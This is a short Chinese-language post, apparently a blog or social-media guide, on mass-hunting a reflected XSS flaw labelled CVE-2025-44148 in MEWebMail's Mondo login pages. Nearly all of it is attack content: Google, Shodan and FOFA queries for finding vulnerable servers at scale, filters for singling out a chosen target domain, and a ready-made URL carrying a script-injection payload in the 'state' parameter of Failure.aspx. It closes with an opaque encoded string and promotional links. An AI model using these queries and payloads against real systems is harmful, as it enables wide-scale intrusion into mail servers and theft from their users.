XSS大规模狩猎:利用CVE-2025-44148漏洞的实战指南
:keycap_1: Google Dorking
inurl:/Mondo/lang/sys
然后简单地在下方端点后追加将XSS负载设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”:
/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22
:keycap_2: Shodan Dorking (200+ 条结果)
http.html:"/MEWebMail/Mondo"
#目标筛选
http.html:"/MEWebMail/Mondo" hostname:target.com
http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com
2个重要的方面分析:
域名 & ssl.cert.subject.cn
:keycap_3: FOFA Dorking (2000+ 条结果)
body="/MEWebMail/Mondo"
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
